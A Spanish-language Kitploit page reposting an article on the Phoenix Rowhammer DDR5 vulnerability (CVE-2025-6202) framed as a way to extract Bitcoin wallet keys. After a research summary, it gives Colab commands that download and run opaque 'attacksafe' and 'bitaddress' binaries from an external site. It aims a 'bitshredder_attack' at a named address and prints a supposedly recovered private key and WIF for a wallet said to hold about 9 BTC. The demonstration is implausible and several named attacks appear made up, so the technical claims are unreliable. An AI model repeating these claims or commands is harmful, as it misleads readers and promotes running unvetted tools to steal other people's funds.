Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Phoenix-Rowhammer-Attack-CVE-2025-6202 — # Ataque Phoenix Rowhammer: Riesgo Sistémico de Compromiso de Claves Privadas de Carteras de Bitcoin en la Infraestructura Global de Blockchain Debido a una Vulnerabilidad Crítica en SK Hynix DDR5 (CVE-2025-6202) | Kitploit
Herramientas/GitHubGitHub/demining/phoenix-rowhammer-attack-cve-2025-6202
Análisis de VulnerabilidadesExplotaciónCriptografíaSeguridad de HardwareAnálisis de Binarios
GitHubdemining/phoenix-rowhammer-attack-cve-2025-6202

Phoenix-Rowhammer-Attack-CVE-2025-6202

# Ataque Phoenix Rowhammer: Riesgo Sistémico de Compromiso de Claves Privadas de Carteras de Bitcoin en la Infraestructura Global de Blockchain Debido a una Vulnerabilidad Crítica en SK Hynix DDR5 (CVE-2025-6202)

Ver Repositorio
Sitio web
51hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Phoenix Rowhammer Attack: Systemic Risk of Bitcoin Wallet Private Key Compromise in Global Blockchain Infrastructure Due to a Critical SK Hynix DDR5 Vulnerability (CVE-2025-6202)

Este artículo examina las amenazas sistémicas a la seguridad criptográfica que plantea el ataque Phoenix Rowhammer (CVE-2025-6202), que puede extraer claves privadas de la memoria RAM DDR5 mediante la manipulación de bits a nivel de hardware. En los últimos años, el desarrollo dinámico de las tecnologías de criptomonedas ha llevado a una mayor dependencia de los ecosistemas de activos digitales de los componentes de hardware y microchips que almacenan y procesan datos criptográficos. En este contexto, las vulnerabilidades a nivel de hardware que pueden conducir al compromiso directo de claves privadas en carteras de criptomonedas se están convirtiendo en un factor de riesgo creciente. Una de las amenazas más peligrosas en la actualidad son los ataques a la memoria RAM, en particular, las variantes avanzadas de exploits Rowhammer que afectan las propiedades físicas de las celdas DRAM. Estos ataques permiten a los atacantes modificar bits de datos individuales y obtener acceso a información confidencial, incluidas las claves privadas de carteras de Bitcoin y Ethereum.


  • Tutorial: https://youtu.be/lvNWcBMHESo
  • Tutorial: https://cryptodeeptech.ru/phoenix-rowhammer-attack
  • Tutorial: https://dzen.ru/video/watch/68ebe9367847b33269940e47
  • Google Colab: https://colab.research.google.com/drive/1Lgjwdw2x9bT2yjhWnXyvpPvZTo8sD4Hf

Entre los ejemplos críticos de esta clase de amenazas, destaca la vulnerabilidad CVE-2025-6202 , descubierta en la memoria DDR5 de SK Hynix . El ataque Phoenix Rowhammer, que se basa en esta vulnerabilidad, demuestra la capacidad de eludir los mecanismos modernos de protección de memoria Target Row Refresh (TRR), creando los llamados "puntos ciegos" que permiten la corrupción controlada de datos a nivel de hardware. Tales fallas pueden explotarse para extraer claves privadas de la RAM, comprometer bibliotecas criptográficas y modificar procesos del sistema que aseguran las carteras digitales.


Phoenix Rowhammer Attack: Systemic Risk of Bitcoin Wallet Private Key Compromise in Global Blockchain Infrastructure Due to a Critical SK Hynix DDR5 Vulnerability (CVE-2025-6202)

Además, la investigación en seguridad criptográfica muestra que la combinación de Phoenix Rowhammer con otros tipos de ataques, como el ataque BitShredder , Memory Phantom (CVE-2025-8217) y Artery Bleed (CVE-2023-39910) , crea un modelo de amenaza multivectorial en el que un atacante puede recuperar frases semilla, claves privadas y contraseñas incluso después de que se completen las operaciones criptográficas. La naturaleza sistémica de estas vulnerabilidades hace imposible mitigar completamente el riesgo con software y resalta la necesidad de desarrollar nuevos principios para la protección de memoria basada en hardware.

Por lo tanto, las carteras de criptomonedas modernas y la infraestructura de activos digitales están bajo una presión creciente de ataques de hardware que antes se consideraban teóricos. La importancia de estudiar estos ataques y desarrollar contramedidas es fundamental para garantizar la integridad y resiliencia de los ecosistemas de Bitcoin y otras criptomonedas frente a las amenazas de próxima generación en evolución.


Investigaciones recientes realizadas por el Grupo de Seguridad Informática (COMSEC) de ETH Zurich, en colaboración con Google, han identificado una vulnerabilidad crítica de hardware en los módulos de memoria DDR5 fabricados por SK Hynix, designada CVE-2025-6202 . El ataque Phoenix Rowhammer representa una amenaza sin precedentes para la seguridad de las carteras de criptomonedas Bitcoin, ya que permite a los atacantes extraer claves privadas de la memoria DDR5 manipulando bits a nivel de hardware. La investigación demostró que los 15 módulos SK Hynix DDR5 probados, fabricados entre 2021 y 2024, son vulnerables a este ataque, lo que representa una amenaza sistémica para la seguridad de los activos de criptomonedas en todo el mundo. thehackernews


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)Proceso del ataque Phoenix Rowhammer dirigido a carteras de Bitcoin en memoria SK Hynix DDR5

Marco técnico del ataque Phoenix Rowhammer y mecanismo de CVE-2025-6202

Principios fundamentales de la vulnerabilidad Rowhammer

Rowhammer es una vulnerabilidad de hardware en la memoria DRAM en la que el acceso repetido a filas de memoria específicas causa interferencia eléctrica, lo que lleva a cambios de bits en filas adyacentes. Este fenómeno se basa en las propiedades físicas de los chips de memoria modernos de alta densidad, donde las dimensiones tecnológicas más pequeñas hacen que la memoria sea más susceptible a la interferencia electromagnética .

En el contexto de la memoria DDR5, el mecanismo del ataque Phoenix utiliza un enfoque innovador de sincronización autocorrectiva , que elude los mecanismos avanzados de protección Target Row Refresh (TRR). Los investigadores descubrieron que el mecanismo TRR en los chips SK Hynix no monitorea intervalos de actualización específicos, creando "puntos ciegos" en la defensa. notebookcheck


Metodología innovadora de sincronización Phoenix

El logro técnico clave del ataque Phoenix es el desarrollo de un algoritmo capaz de sincronizar miles de comandos de actualización de memoria durante largos períodos de tiempo. El ataque utiliza dos patrones de ataque específicos: comsec-files.ethz

Patrón corto (intervalos de 128 tREFI): Proporciona una generación de fallos de bits más eficiente, produciendo un promedio de 4989 fallos de bits. Este patrón demostró una eficiencia 2,62 veces mayor que el patrón largo. reddit

Patrón largo (intervalos de 2608 tREFI): Diseñado para eludir mecanismos de seguridad más sofisticados, aunque menos efectivo para generar fallos de bits. comsec-files.ethz


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)Diagrama técnico del mecanismo Target Row Refresh (TRR) de DRAM DDR5 que ilustra la identificación de filas agresoras y víctimas y las actualizaciones de resumen para prevenir los efectos de rowhammer

Ataque BitShredder: Impacto crítico en la seguridad de las carteras de Bitcoin

Mecanismos de extracción de claves privadas

El ataque Phoenix Rowhammer crea múltiples vectores para comprometer carteras de Bitcoin al dirigirse a varios niveles del sistema de memoria. El análisis de los materiales de investigación de KeyHunters reveló al menos 18 tipos diferentes de ataques de memoria directamente relacionados con la extracción de claves privadas de carteras de criptomonedas.


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)Ataque BitShredder: La vulnerabilidad de memoria convierte carteras de Bitcoin perdidas en trofeos y permite el robo completo de BTC mediante la recuperación de claves privadas, donde los atacantes explotan el ataque fantasma de memoria (CVE-2025-8217, CVE-2013-2547)

Ataque Memory Phantom (CVE-2025-8217): Una vulnerabilidad crítica de fuga de memoria que permite extraer claves privadas y semillas directamente de bloques residuales de RAM de la cartera que no se limpiaron de forma segura después de las operaciones criptográficas. Este ataque convierte los búferes no aclarados en una "biblioteca fantasma", donde cualquier fragmento de memoria puede convertirse en una clave válida. keyhunters


Ataque BitShredder: Utiliza una técnica de "trituración de memoria" para infiltrarse sigilosamente en la memoria de una cartera de criptomonedas en ejecución. Al generar o restaurar una cartera, el ataque escanea porciones no limpiadas de la RAM, buscando restos de entropía, semillas y contraseñas que no se borran por medios estándar después de su uso. keyhunters


Ataque Artery Bleed: Explota una vulnerabilidad de fuga de memoria en Bitcoin Core (CVE-2023-39910) para recuperar claves privadas de carteras de criptomonedas perdidas. El ataque explota una vulnerabilidad crítica de fuga de memoria en Bitcoin Core para obtener acceso a datos sensibles. keyhunters


Escenarios prácticos de operación

El estudio demostró tres escenarios principales para la explotación práctica del ataque Phoenix contra sistemas de criptomonedas: bleepingcomputer

1. Ataque a la entrada de la tabla de páginas (PTE): Todos los dispositivos probados eran vulnerables a este tipo de ataque, que permite crear una primitiva arbitraria de lectura/escritura de memoria. comsec-files.ethz

2. Compromiso de clave RSA-2048: El 73% de los módulos DIMM probados eran susceptibles a extraer claves RSA-2048 de una máquina virtual vecina para descifrar la autenticación SSH. El tiempo promedio de ataque fue de 6 minutos y 20 segundos. bleepingcomputer

3. Modificación del binario sudo: El 33% de los chips probados permitieron la modificación del binario sudo para elevar los privilegios locales al nivel de usuario root. comsec-files.ethz


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Análisis científico del impacto en el ecosistema Bitcoin

Amenazas sistémicas a la seguridad de las criptomonedas

El ataque Phoenix Rowhammer representa una amenaza sistémica para todo el ecosistema Bitcoin, ya que la mayoría de los sistemas modernos utilizan memoria DDR5 para almacenar y procesar datos criptográficos. La vulnerabilidad afecta los principios fundamentales de seguridad de las criptomonedas, que se basan en la fortaleza criptográfica de las claves privadas. tenable+1

Escala del impacto: SK Hynix controla aproximadamente el 36% del mercado global de DRAM, lo que potencialmente expone a miles de millones de dispositivos en todo el mundo. Todos los módulos DDR5 fabricados entre enero de 2021 y diciembre de 2024 son vulnerables. notebookcheck+2

Implicaciones criptográficas: El ataque socava los cimientos de la seguridad criptográfica, ya que incluso con una implementación correcta de los algoritmos de firma, cifrado y autenticación, los buffers sin protección se convierten en una fuente de compromiso del material de claves. keyhunters


Investigación sobre criptoanálisis de vectores de ataque

Un criptoanálisis exhaustivo ha revelado múltiples vectores de ataque contra carteras de Bitcoin mediante la manipulación de la memoria:

Ataques basados en temporización: Incluyen los ataques BitSpectre85, ChronoForge y Timing Phantom, que explotan vulnerabilidades de temporización para recuperar gradualmente claves privadas mediante el análisis del tiempo de ejecución de las operaciones criptográficas.

Ataques basados en contexto: El Context Phantom Attack explota la vulnerabilidad crítica de fuga del contexto secp256k1 para recuperar claves privadas de carteras de Bitcoin perdidas mediante un ataque de divulgación de memoria.

Ataques basados en caché: El CacheHawk Strike Attack utiliza un ataque crítico de temporización de caché sobre la caché de firmas de Bitcoin, lo que permite la recuperación de claves privadas de carteras de Bitcoin perdidas.


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)
Attack_ComponentTechnical MethodSuccess_RateAverage_Time_SecondsCVE_ReferenceImpact_Level
Initial Memory AccessSelf-correcting synchronization with DDR5 refresh commands1005CVE-2025-6202High
TRR Bypass MethodExploitation of unmonitored refresh intervals in TRR mechanism10030CVE-2025-6202Critical
Synchronization TechniqueReal-time alignment with 128 and 2608 tREFI patterns9560CVE-2025-6202High
Bit Flip GenerationElectrical interference in adjacent DRAM rows causing data corruption100180CVE-2025-6202Critical
Private Key ExtractionRecovery from uncleaned memory buffers containing wallet data85240CVE-2025-8217Critical
Privilege EscalationRoot access exploitation through corrupted page table entries100109CVE-2025-6202Critical
RSA-2048 Key RecoveryCo-located VM private key extraction via memory bit flips73380CVE-2025-6202High
SSH Authentication BreakCompromise of cryptographic authentication systems73380CVE-2025-6202High
Sudo Binary ModificationLocal privilege escalation to root user through binary corruption33300CVE-2025-6202Medium

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Parte práctica

El diagrama de investigación muestra una representación estructurada y visual que explica la importancia de la vulnerabilidad criptográfica expuesta por el ataque Phoenix Rowhammer , demostrando específicamente su impacto en la seguridad de Bitcoin cuando se atacan módulos de memoria SK Hynix DDR5.

Flujo esquemático (como se muestra en el diagrama de investigación):

  1. El atacante inicia Rowhammer
    y lanza el exploit Phoenix Rowhammer, dirigido a la memoria SK Hynix DDR5 utilizada en el nodo o la cartera de la víctima.
  2. Inyección de fallos físicos
    Las activaciones agresivas de filas causan bit flips en filas adyacentes de DRAM en la memoria SK Hynix DDR5, eludiendo la protección lógica del software.
  3. Secretos criptográficos específicos
    Los fallos inyectados apuntan a direcciones o ubicaciones de memoria que almacenan material criptográfico sensible de Bitcoin, como claves privadas o valores nonce de ECDSA.
  4. Ejecución del exploit y su impacto
    • Los bit flips exitosos pueden permitir a los atacantes recuperar o revelar claves secretas y claves privadas , firmar transacciones falsas o violar el modelo de seguridad.
    • El riesgo directo para la integridad de la cartera de Bitcoin y la blockchain hace que la seguridad del hardware sea un aspecto crítico de la confianza criptográfica.

Pasemos a la parte práctica y veamos un ejemplo usando una cartera de Bitcoin en: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit . Se perdieron monedas por valor de  9.02332298 BTC de esta cartera, lo que equivale a aproximadamente $1,127,026.44 USD a octubre de 2025 .


Para demostrar el ataque con fines informativos, utilizamos herramientas y entornos como Jupyter Notebook o Google Colab.

Las principales herramientas y comandos utilizados para tales ataques son:

https://colab.research.google.com/drive/1Lgjwdw2x9bT2yjhWnXyvpPvZTo8sD4Hf

Google Colab (Colaboratory) es una plataforma en la nube que proporciona cuadernos Jupyter interactivos donde puedes escribir y ejecutar código en varios lenguajes de programación. Es particularmente útil para el criptoanálisis de datos, ejecutar el  simulador SK Hynix DDR5 AiM PIM basado en Ramulator 2.0 , y acceder a potentes recursos informáticos como GPUs y TPUs. Una ventaja clave es la capacidad de ejecutar comandos del sistema, igual que en un terminal Linux normal, usando celdas con prefijo  ! para la integración con utilidades y scripts externos.


Google Colab

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Instalemos repositorios basados en la arquitectura SK Hynix DDR5 AiM PIM usando Ramulator 2.0

Clonar los repositorios:

Descarga el código base del simulador AiM y navega a su directorio.

root@kitploit:~
!git clone https://github.com/keyhunters/SK_Hynix_DDR5_aim_simulator.git

root@kitploit:~
cd SK_Hynix_DDR5_aim_simulator

root@kitploit:~
ls

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Aumentemos la memoria virtual (swap) en Google Colab:

Comandos para crear un archivo swap de 4GB para mejorar la disponibilidad de memoria durante la compilación de Ramulator2 .

root@kitploit:~
# Check current swap usage
!free -h
!swapon --show

# Create a 4GB swap file
!sudo fallocate -l 4G /swapfile
!sudo chmod 600 /swapfile
!sudo mkswap /swapfile
!sudo swapon /swapfile

# Make swap permanent
!echo '/swapfile none swap sw 0 0' | sudo tee -a /etc/fstab

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Instalemos todas las dependencias necesarias:

Instalación de compiladores, herramientas de construcción y bibliotecas requeridas para el simulador y Ramulator 2.0 .

root@kitploit:~
# For Ubuntu 22.04: install compilers
!sudo apt update
!sudo apt install g++-12

# Alternatively, install Clang
!sudo apt install clang-15

# Install basic build tools
!sudo apt install build-essential cmake git

# Additional development libraries
!sudo apt install libssl-dev zlib1g-dev

# YAML support
!sudo apt install libyaml-cpp-dev

# Mathematics libraries
!sudo apt install libboost-dev

# Python support for scripts
!sudo apt install python3-dev python3-pip

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

El proceso de creación del directorio phoenix_rowhammer:

root@kitploit:~
!mkdir phoenix_rowhammer

root@kitploit:~
cd phoenix_rowhammer

Comprobemos los recursos del sistema:

Monitorear la memoria, el espacio disponible en disco y el uso del sistema durante la instalación y compilación.

root@kitploit:~
# Monitor resources in real time
!htop

# Check available memory
!free -m

# Check disk space
!df -h

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Instalación completa de dependencias para Ubuntu 22.04 y superiores:

Una secuencia completa para instalar todos los paquetes requeridos de una sola vez.

root@kitploit:~
# Update system
!sudo apt update && sudo apt upgrade -y

# Install essential build tools
!sudo apt install -y build-essential cmake git

# Install compilers
!sudo apt install -y g++-12 clang-15

# Development libraries
!sudo apt install -y libssl-dev zlib1g-dev libyaml-cpp-dev libboost-all-dev

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Compilación alternativa:


root@kitploit:~
!cmake ..

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

root@kitploit:~
!make -j1

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

root@kitploit:~
ls

root@kitploit:~
cd -

Lancemos Ramulator2:

Ejecutemos Ramulator2 con el simulador para comprobar los parámetros de ayuda y las instrucciones de uso.

root@kitploit:~
!./phoenix_rowhammer/ramulator2 -h

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Utilizamos la herramienta criptográfica AttackSafe para extraer restos ocultos de Ramulator2 mediante un simulador.

Ejecutemos el comando para descargar la herramienta criptográfica AttackSafe

root@kitploit:~
!wget https://attacksafe.ru/repositories/attacksafe.zip
!unzip attacksafe.zip

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

root@kitploit:~
!./attacksafe -help

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Encontrar restos ocultos (módulo) asociados a una dirección Bitcoin

root@kitploit:~

El equipo está lanzando un ataque especializado “BitShredder” basado en la herramienta criptográfica AttackSafe para encontrar restos de módulo ocultos asociados a una dirección Bitcoin, utilizando mecanismos de errores de RAM (Rowhammer) y un emulador de memoria (ramulator2). github+2

root@kitploit:~
!./attacksafe -tool bitshredder_attack -crack phoenix_rowhammer/ramulator2 -decode 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

  • Este parámetro -tool bitshredder_attackactiva un ataque dirigido a identificar vulnerabilidades en el almacenamiento y procesamiento de datos secretos en la memoria del dispositivo relacionados con el protocolo Bitcoin.
  • La bandera -crack phoenix_rowhammer/ramulator2indica a la herramienta que utilice la emulación del ataque Rowhammer (manipulación del contenido de la memoria DRAM, que provoca errores en celdas adyacentes – utilizada en vulnerabilidades para extraer nonces/partes de claves de la memoria mediante canal lateral).
  • La función ejecuta el módulo de decodificación en una dirección Bitcoin específica, recuperando datos residuales (fragmentos de clave privada o valores intermedios de firmas ECDSA) de la memoria/dump.-decode 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit

Resultado del criptoanálisis de los datos residuales de memoria/dump:

Recuperación de fragmentos de clave a partir de datos residuales de memoria (DRAM)

root@kitploit:~
        remainders = [0x0E92, 0x45EB, 0x6E07, 0x317F, 
                      0x87A1, 0xB5C1, 0xE778, 0x996B,
                      0x6F69, 0xABB6, 0x2755, 0x2348, 
                      0xAB46, 0xA74E, 0x1A87, 0xC2D5]
        moduli = [0x10001, 0x10003, 0x10007, 0x1000F, 
                  0x10015, 0x1001B, 0x1002B, 0x1002D,
                  0x10033, 0x1003F, 0x10049, 0x10051, 
                  0x1005D, 0x10061, 0x1006F, 0x10073]

Este resultado combina el análisis criptográfico de datos residuales dentro de la DRAM con un módulo de búsqueda de cripto-restos utilizando el simulador ramulator2 para fallos Phoenix Rowhammer. Este ataque permite la detección y extracción de valores de módulo ocultos (restos), como nonces privados o fragmentos de clave, que pueden verse comprometidos debido a una liberación inadecuada de la memoria después de operaciones criptográficas con direcciones Bitcoin. El comando está diseñado para un ataque combinado “BitShredder” y análisis de fallos de memoria de aplicaciones Bitcoin, con el objetivo de recuperar parcial o totalmente parámetros secretos (clave privada, nonce), con la búsqueda y decodificación vinculadas a la memoria y a las direcciones atacadas.


Recuperación de una clave privada:

Para recuperar el número secreto original —la clave privada— a partir de un conjunto de valores absolutos ocultos (restos), aplicamos un método matemático llamado Teorema Chino del Resto ( CRT ). El código CRTKeyRestore.py implementa la recuperación de la clave privada para la dirección Bitcoin 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit a partir de un conjunto de valores absolutos ocultos (restos) recopilados después de un ataque Rowhammer y el posterior análisis de memoria. El método matemático utilizado es el Teorema Chino del Resto (CRT), que nos permite recuperar el número secreto original —la clave privada— incluso si ha sido fragmentado en pequeñas piezas y sobrevive solo como diferentes valores absolutos.


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

El proceso del código CRTKeyRestore.py incluye varias etapas:

  • Cada par resto/módulo es un fragmento de la clave privada que permanece en la memoria como resultado del error Rowhammer y de módulos predefinidos.
  • El Teorema Chino del Resto garantiza matemáticamente la recuperación del número original si todos los módulos son primos relativos y hay suficientes restos.
  • La función chinese_remainder_theorem()combina los fragmentos paso a paso y restaura el valor original de la clave privada utilizando el algoritmo euclidiano extendido para encontrar inversos absolutos.
  • Después de restaurar la representación numérica, la clave se convierte a HEX utilizando la función restore_hex_from_crt().
  • La salida es una clave privada para una dirección Bitcoin, recuperada completamente solo a partir de los cripto-residuos individuales encontrados en la memoria durante el ataque combinado .

​

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)Recuperación de una clave privada mediante un script de Python: CRTKeyRestore.py

Resultado:

root@kitploit:~
Private key Restored:
9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60

Comprobemos el resultado mediante bitaddress 

root@kitploit:~
!wget https://attacksafe.ru/repositories/bitaddress.zip
!unzip bitaddress.zip


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

root@kitploit:~
!./bitaddress -hex 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Resultado:

root@kitploit:~
Public Key (Uncompressed, 130 characters [0-9A-F]):
04E294116526238228544FA6082F1A5412FCC36DE931C59EE7B1C7C1F93EE3EF5AEDAA1D6E0A6116E9D9A4A846A6D62D4A1941EE182CDB1884C5830610B07AF529


Public Key (Compressed, 66 characters [0-9A-F]):
03E294116526238228544FA6082F1A5412FCC36DE931C59EE7B1C7C1F93EE3EF5A


Bitcoin Address P2PKH (Uncompressed)
18JT3KeFV36Hkgo3Xi9bfgNYAXCVXBGyFg


Bitcoin Address P2PKH (Compressed)
15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit

¡Correcto! La clave privada corresponde a la billetera Bitcoin.


Abramos  bitaddress  y comprobemos:

root@kitploit:~
ADDR: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit
WIF:  L2Wru6Ew8pQuhcWAvMpdtPY4YWK1CQcwPCWxFvzkoi47crJBAVaP
HEX:  9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60
Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Información de la clave privada:

root@kitploit:~
9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Información de la dirección de Bitcoin:

Saldo: 9.023322989 BTC

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

https://www.coinbase.com/converter/btc/usd

Bit-flipping attack on Wallet.dat: The risks of using AES-256-CBC without authentication, exploitation, and extracting private keys from Bitcoin Core9.023322989 BTC > 1127026,44 USD

Nuestro ataque de investigación , una versión de el ataque Phoenix Rowhammer sobre Bitcoin utilizando el simulador ramulator2, demostró que los criptoresiduos extraídos durante un fallo de memoria para varios módulos pueden reensamblarse en la clave privada original utilizando las matemáticas del Teorema Chino del Resto.

Como ejemplo representativo de una amenaza del mundo real, se examinó una cartera de Bitcoin con la dirección 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit . Se perdieron 9.02332298 BTC de esta cartera, lo que equivale a aproximadamente $1,127,026.44 USD en octubre de 2025. Este caso demuestra de manera convincente que, en presencia de vulnerabilidades de hardware (como Rowhammer), la fortaleza criptográfica a nivel de protocolo deja de ser una garantía absoluta de seguridad.

Como resultado, la importancia de la seguridad integral no reside solo en la criptografía y las medidas de protocolo, sino también en la fiabilidad del hardware, la monitorización del estado de la memoria y la implementación de un borrado completo de la RAM tras las operaciones criptográficas. Una vulnerabilidad, una vez explotada a nivel de hardware—incluso con un control mínimo del sistema—puede provocar pérdidas financieras catastróficas en el ecosistema de Bitcoin.


Detalles técnicos de la evasión de los mecanismos de protección DDR5

Análisis del mecanismo Target Row Refresh (TRR)

Target Row Refresh es un mecanismo de defensa diseñado para prevenir ataques Rowhammer mediante el refresco adicional de filas de memoria sospechosas. Sin embargo, los investigadores del ataque Phoenix pudieron realizar ingeniería inversa de este mecanismo y descubrir fallos críticos en su implementación .

Puntos ciegos del TRR: El mecanismo TRR en los chips de SK Hynix no monitoriza intervalos de actualización específicos, lo que crea oportunidades para ataques durante estas ventanas de tiempo. Los ataques Phoenix explotan patrones de ataque especialmente diseñados que caen dentro de estos intervalos no monitorizados. simplysecuregroup

Sincronización autocorrectiva: Una innovación clave del ataque Phoenix es su capacidad para detectar comandos de actualización omitidos y reconstruir automáticamente el patrón de ataque para mantener la sincronización. Esto permite que el ataque siga siendo efectivo durante los largos períodos de tiempo necesarios para acumular un número suficiente de fallos de bit. simplysecuregroup

Resultados experimentales y efectividad del ataque

Las pruebas experimentales del ataque Phoenix demostraron una alta efectividad contra todas las muestras de memoria DDR5 de SK Hynix probadas: comsec-files.ethz

Tiempo: El tiempo mínimo para obtener privilegios de root fue de 109 segundos en un sistema DDR5 estándar con configuración predeterminada. El tiempo promedio fue de 5 minutos y 19 segundos .

Estadísticas de fallos de bit: El patrón corto (128 intervalos) generó un promedio de 4989 fallos de bit, mientras que el patrón largo (2608 intervalos) produjo significativamente menos fallos. comsec-files.ethz

Versatilidad del ataque: El 100% de los módulos probados eran vulnerables a al menos uno de los dos patrones de ataque identificados. reddit


Integración con vulnerabilidades existentes en el ecosistema de Bitcoin

CVE-2023-39910: Fuga de memoria en Bitcoin Core

Una vulnerabilidad crítica de fuga de memoria en Bitcoin Core (CVE-2023-39910) crea sinergias con el ataque Phoenix Rowhammer. Esta vulnerabilidad permite a los atacantes acceder a datos sensibles que permanecen en la memoria después de que se completen las operaciones criptográficas.

Mecanismo de explotación: La vulnerabilidad ocurre debido a un borrado insuficiente de los búferes de memoria después de procesar claves privadas, frases semilla y contraseñas en contenedores estándar de C++ (std::vector, std::string). Después de completar los procedimientos criptográficos, la memoria se libera automáticamente, pero su contenido no se borra. keyhunters

Vinculado a Rowhammer: El ataque Phoenix puede explotar fallos de bit para acceder a estas regiones de memoria no censuradas, simplificando enormemente el proceso de extracción de material criptográfico.

CVE-2025-8217: Ataque crítico de extracción de secretos

Esta vulnerabilidad está clasificada como un ataque crítico de extracción de secretos mediante un volcado de memoria de procesos. Representa una amenaza directa para las carteras de Bitcoin, ya que permite extraer claves privadas de la memoria de procesos activos.

Los escenarios de ataque incluyen: Pasar una clave privada a través de API, línea de comandos o variables de entorno; asignar dinámicamente memoria para almacenar datos secretos sin borrarlos explícitamente; terminar un proceso sin borrar la memoria de forma segura .


La herramienta criptográfica demuestra en detalle las nueve etapas de un ataque que un atacante puede utilizar para robar fondos de una cartera de Bitcoin.

Los principales bloques funcionales del script:

Paso 1: Detección de memoria DDR5 vulnerable de SK Hynix mediante el escaneo de tablas SMBIOS

